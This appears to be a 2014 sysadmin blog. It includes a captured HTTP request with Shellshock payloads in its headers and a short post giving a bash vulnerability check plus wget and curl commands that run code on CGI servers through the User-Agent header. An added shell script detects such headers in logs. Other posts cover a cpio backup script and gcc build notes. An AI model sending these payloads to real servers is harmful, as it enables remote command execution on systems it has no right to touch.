GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la
Referer: () { :; }; ping -c 23 10.1.1.1
Monday, September 29, 2014
thanks f5
Thursday, September 25, 2014
with a rusty spoon
well kids. this just sucks donkey balls.
get shell and issue:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi
and better.
curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi
with a rusty spoon.
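A defender-side check for the requests shown in these posts, as an added example that is not part of the original blog: two shell functions that flag request headers and combined-format access log entries whose value begins with `() {`. The function names, the sample request and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original posts): flag HTTP input whose values
# start with "() {", the function-definition prefix in the requests above.

# Raw HTTP request on stdin -> names of headers whose value starts with "() {".
flag_headers() {
    awk '
        { sub(/\r$/, "") }                      # tolerate CRLF line endings
        NR == 1 { next }                        # skip the request line
        body || $0 == "" { body = 1; next }     # ignore everything after the headers
        {
            i = index($0, ":")
            if (i == 0) next
            value = substr($0, i + 1)
            sub(/^[ \t]+/, "", value)           # "Host:() {" and "Host: () {" both count
            if (substr(value, 1, 4) == "() {") print substr($0, 1, i - 1)
        }'
}

# Combined-format access log on stdin -> "line-number client" for each entry
# with a quoted field (request, referer, user-agent) starting with "() {".
# Every field after the first is checked, so an escaped quote in an earlier
# field cannot shift the payload out of view.
flag_log_lines() {
    awk -F'"' '
        {
            for (f = 2; f <= NF; f++)
                if (substr($f, 1, 4) == "() {") {
                    split($1, a, " ")
                    print NR " " a[1]
                    break
                }
        }'
}

# Constructed sample input; client addresses are documentation ranges.
sample_request() {
    printf '%s\r\n' 'GET /cgi-bin/valid.cgi HTTP/1.1' 'Host: www.example.test' \
        'Cookie: () { :;}; echo vulnerable' 'Referer:() { :;}; echo vulnerable' \
        'X-Note: uses () { in the middle' '' 'body: () { not a header'
}
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 200 40 "-" "() { :;}; echo vulnerable"
198.51.100.8 - - [25/Sep/2014:10:00:03 +0000] "GET /a HTTP/1.1" 200 40 "http://x/\"q\"" "() { :;}; echo vulnerable"
EOF
}
sample_request | flag_headers; sample_log | flag_log_lines
```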
Wednesday, September 24, 2014
simple cpio script
rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
#!/bin/sh
echo start "$(date)" >> /var/log/cpio.log
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount
echo end "$(date)" >> /var/log/cpio.log
Wednesday, September 17, 2014
install gcc notes
1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release (To install SVN, see how to Work with SVN)

2) Check to make sure install-sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr \
    --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man \
    --libdir=/usr/lib64 --libexecdir=/usr/lib64 \
    --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release \
    --with-gxx-include-dir=/usr/include/c++/4.1.0 --enable-ssp --disable-libssp \
    --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib \
    --with-slibdir=/lib64 --with-system-zlib --enable-shared --enable-__cxa_atexit \
    --enable-libstdcxx-allocator=new --without-system-libunwind --with-cpu=generic \
    --host=x86_64-suse-linux

Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/

or...

1) Search for an rpm package for your specific OS, e.g.: http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34

2) You can make a symbolic link to the newly uploaded gcc in /usr/bin